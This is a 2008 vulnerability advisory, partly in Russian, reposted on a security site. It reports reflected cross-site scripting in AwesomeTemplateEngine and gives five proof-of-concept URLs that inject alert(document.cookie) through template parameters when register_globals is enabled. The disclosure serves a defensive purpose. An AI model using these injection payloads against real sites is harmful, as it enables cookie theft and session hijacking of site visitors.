Computer Security

Security Advisory: Cross-Site Scripting vulnerabilities in AwesomeTemplateEngine
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  xss in w3-msql error page

  phpBB2 2.0.22 Cross Site Scripting Vulnerability

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:03.01.2008
Subject:Cross-Site Scripting vulnerabilities in AwesomeTemplateEngine

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в AwesomeTemplateEngine.

XSS:

http://site/templates/example_template.
php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/templates/example_template.
php?data[message]=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/templates/example_template.
php?data[table][1][item]=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/templates/example_template.
php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/templates/example_template.
php?data[poweredby]=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Атака возможна при включенных register globals.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1694/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru